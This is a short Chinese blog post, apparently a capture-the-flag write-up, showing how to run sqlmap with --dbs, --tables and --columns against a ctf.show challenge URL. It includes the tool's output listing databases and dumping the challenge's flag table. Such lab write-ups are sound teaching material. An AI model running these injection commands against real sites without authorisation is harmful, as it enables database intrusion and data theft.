sqlmap使用

23 年 12 月 17 日 星期日
229 字
2 分钟

sqlmap使用


  • 常用参数
text
常用参数
--dbs 所有数据库
--tables 所有表
--columns 所有列

第一步:开始脚本注入


  • 使用sqlmap -u url来进行注入

例:

sqlmap -u "http://d96b8b94-0e30-4e6a-810b-caf654fe2b02.challenge.ctf.show/?id="


第二步:查表

执行上述命令后得到注入成功的回显然后可以进行查库操作


如上述命令执行后得到

text

available databases [7]:                                                                                                                                                                                    
[*] ctfshow
[*] ctftraining
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

text
Database: ctfshow
[1 table]
+------+
| flag |
+------+
text

Database: ctfshow                                                                                                                                                                                           
Table: flag
[2 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| flag   | varchar(255) |
| id     | int(11)      |
+--------+--------------+

text
Database: ctfshow
Table: flag
[1 entry]
+----+-----------------------------------------------+
| id | flag                                          |
+----+-----------------------------------------------+
| 1  | ctfshow{cd6650cb-4523-49ee-8251-bcbf145e920c} |
+----+-----------------------------------------------+

文章标题:sqlmap使用

文章作者:huarui

文章链接:https://54huarui.online/posts/sql2[复制]

最后修改时间:


商业转载请联系站长获得授权,非商业转载请注明本文出处及文章链接,您可以自由地在任何媒体以任何形式复制和分发作品,也可以修改和创作,但是分发衍生作品时必须采用相同的许可协议。
本文采用CC BY-NC-SA 4.0进行许可。